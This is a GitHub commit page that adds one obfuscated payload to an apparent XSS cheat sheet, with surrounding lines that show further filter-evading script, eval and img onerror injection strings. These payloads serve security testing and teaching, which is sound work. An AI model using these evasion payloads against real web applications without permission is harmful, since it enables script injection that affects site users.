Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Sep 7, 2021
2 parents 23438cc + 90f37e5 commit 780d8ba
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions XSS Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
Expand Down

0 comments on commit 780d8ba

Please sign in to comment.